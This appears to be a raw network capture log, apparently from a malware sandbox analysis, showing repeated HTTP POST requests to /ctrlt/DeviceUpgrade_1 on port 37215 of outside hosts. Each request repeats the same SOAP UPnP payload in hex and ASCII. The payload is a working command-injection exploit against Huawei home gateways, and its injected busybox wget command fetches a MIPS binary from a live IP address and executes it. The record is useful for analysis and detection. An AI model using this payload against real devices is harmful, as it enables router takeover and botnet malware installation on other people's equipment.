24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:04.359695911 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:05.351619959 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:07.335278988 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:11.302711964 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:19.237576962 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:35.111361027 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          447192.168.2.2353148156.235.99.4037215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:03.497246027 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:04.359707117 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
